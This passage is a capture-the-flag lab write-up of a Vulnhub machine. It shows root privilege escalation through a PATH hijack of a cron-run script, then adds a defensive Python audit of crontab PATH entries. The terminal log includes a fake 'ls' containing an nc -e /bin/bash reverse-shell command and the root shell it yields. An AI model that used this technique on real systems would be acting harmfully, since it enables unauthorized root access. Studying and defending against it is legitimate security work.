jerome@jerome:/tmp$ ls -alh /usr/share/simulate.sh
ls -alh /usr/share/simulate.sh
-rwxr-xr-x 1 root root 130 Apr 16 2019 /usr/share/simulate.sh
Since simulate.sh runs commands such as ls without an absolute path, we can create our own ls (which is actually a reverse shell) and add its location to the PATH variable:
jerome@jerome:/home/jerome$ ls
ls
flag.txt
jerome@jerome:/home/jerome$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 jerome jerome 4.0K Dec 31 06:07 .
drwxr-xr-x 3 root root 4.0K Apr 16 2019 ..
-rw------- 1 jerome jerome 531 Dec 31 06:07 .bash_history
-rw-r--r-- 1 jerome jerome 220 Apr 16 2019 .bash_logout
-rw-r--r-- 1 jerome jerome 3.7K Apr 16 2019 .bashrc
drwx------ 2 jerome jerome 4.0K Apr 16 2019 .cache
drwxrwxr-x 3 jerome jerome 4.0K Apr 16 2019 .local
-rw-r--r-- 1 jerome jerome 807 Apr 16 2019 .profile
-rw-r--r-- 1 jerome jerome 0 Apr 16 2019 .sudo_as_admin_successful
-rw-r--r-- 1 1001 1001 12 Apr 12 2019 flag.txt
jerome@jerome:/home/jerome$ echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
echo "nc -e /bin/bash 192.168.56.206 9999" >> ls
jerome@jerome:/home/jerome$ chmod 777
chmod 777
chmod: missing operand after '777'
Try 'chmod --help' for more information.
jerome@jerome:/home/jerome$ chmod 777 ls
chmod 777 ls
jerome@jerome:/home/jerome$
mp:$PATH
A reverse shell from the root user was successfully received on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 39892
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 36K
drwx------ 3 root root 4.0K Apr 20 2019 .
drwxr-xr-x 22 root root 4.0K Mar 31 2019 ..
-rw------- 1 root root 607 Apr 20 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 13 2019 .bashrc
-rw------- 1 root root 11 Apr 12 2019 flag.txt
drwxr-xr-x 3 root root 4.0K Mar 31 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 12 Apr 20 2019 .python_history
-rw-r--r-- 1 root root 66 Apr 3 2019 .selected_editor
cat flag.txt
f60532cf8a
Lessons learned
- In Metasploit, the Proxies setting is not a URL but type:host:port, with no // in the middle.
- When a script running with root privileges executes a command without an absolute path, a command of the same name can be planted that is in fact a reverse shell.
- In Metasploit, when RHOSTS is the local host, do not set it to localhost; use 127.0.0.1 instead.
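The second lesson above is the PATH-hijack pattern, and the detail that makes it work on this box is in the crontab: PATH starts with `.`, so after simulate.sh does `cd /home/jerome` the bare `ls` resolves to any file named ls in jerome's home directory. The following Python audit is an added example, not part of the original writeup or of the box: it parses a system crontab and the scripts it launches as root, flagging untrusted PATH entries and bare command names, with sample input constructed from the two files shown above.

```python
"""Audit a system crontab plus the scripts it runs as root for the PATH-hijack
pattern: an untrusted PATH entry ('.', empty, or relative) combined with
commands invoked without an absolute path. Added example for this writeup;
it works on text only, so it runs offline against the constructed samples."""
import re
from typing import Dict, List, Tuple

# Constructed sample input: /etc/crontab and /usr/share/simulate.sh as shown
# in the writeup (only the lines relevant to the audit are reproduced).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=.:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /bin/bash /usr/share/simulate.sh
@reboot root dhclient
"""
SAMPLE_SCRIPTS = {"/usr/share/simulate.sh": """\
#
# This script simulates human behaviour from the root account
#
while true
do
cd /home/jerome;
ls;
sleep 120;
done
"""}

# Words that never resolve through PATH in a POSIX shell.
KEYWORDS = {"if", "then", "else", "elif", "fi", "while", "until", "do", "done",
            "for", "in", "case", "esac", "{", "}", "!"}
BUILTINS = {"cd", "true", "false", "echo", "exit", "export", "set", "unset",
            "read", "test", "[", "shift", "return", "break", "continue", ":"}
# PATH that cron uses when the crontab does not set one (assumed default).
CRON_DEFAULT_PATH = "/usr/bin:/bin"


def parse_crontab(text: str) -> Tuple[Dict[str, str], List[Tuple[str, str]]]:
    """Return (environment assignments, [(user, command), ...]) from a
    system crontab in /etc/crontab format (the one with a user field)."""
    env: Dict[str, str] = {}
    jobs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", line)
        if m:
            env[m.group(1)] = m.group(2).strip().strip('"')
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)      # @reboot user command
            expected = 3
        else:
            fields = line.split(None, 6)      # m h dom mon dow user command
            expected = 7
        if len(fields) == expected:
            jobs.append((fields[-2], fields[-1]))
    return env, jobs


def audit_path(path_value: str) -> List[str]:
    """Flag PATH entries that let a non-root user decide what a bare command
    name resolves to: '.' or an empty entry (both mean the current
    directory) and any relative directory."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append("PATH searches the current directory ('%s')" % entry)
        elif not entry.startswith("/"):
            findings.append("PATH contains relative directory '%s'" % entry)
    return findings


def bare_commands(shell_text: str) -> List[Tuple[int, str]]:
    """Return (line number, name) for every command invoked without a slash.
    Each line is split on ;, &&, || and |; the first word of each segment is
    examined after skipping keywords, VAR=value prefixes and builtins."""
    found = []
    for lineno, raw in enumerate(shell_text.splitlines(), 1):
        line = raw.split("#", 1)[0]           # drop comments
        for segment in re.split(r";|&&|\|\|?", line):
            words = segment.split()
            while words and (words[0] in KEYWORDS or "=" in words[0]):
                words.pop(0)
            if words and "/" not in words[0] and words[0] not in BUILTINS:
                found.append((lineno, words[0]))
    return found


def audit(crontab_text: str, scripts: Dict[str, str]) -> List[str]:
    """Combine both checks. A bare command is HIGH risk only when PATH has an
    untrusted entry; otherwise it is reported as LOW. `scripts` maps the
    script paths named in jobs to their contents (no filesystem access)."""
    env, jobs = parse_crontab(crontab_text)
    path_issues = audit_path(env.get("PATH", CRON_DEFAULT_PATH))
    severity = "HIGH" if path_issues else "LOW"
    report = ["[HIGH] " + issue for issue in path_issues]
    for user, command in jobs:
        for _, name in bare_commands(command):
            report.append("[%s] job as %s runs '%s' without absolute path: %s"
                          % (severity, user, name, command))
        for path, body in scripts.items():
            if path in command:
                for lineno, name in bare_commands(body):
                    report.append("[%s] %s line %d (run as %s) calls bare '%s'"
                                  % (severity, path, lineno, user, name))
    return report


if __name__ == "__main__":
    for finding in audit(SAMPLE_CRONTAB, SAMPLE_SCRIPTS):
        print(finding)
```

Removing the leading `.:` from the crontab PATH downgrades every finding to LOW, which is the fix a defender would apply first; replacing the bare names in simulate.sh with absolute paths removes them entirely.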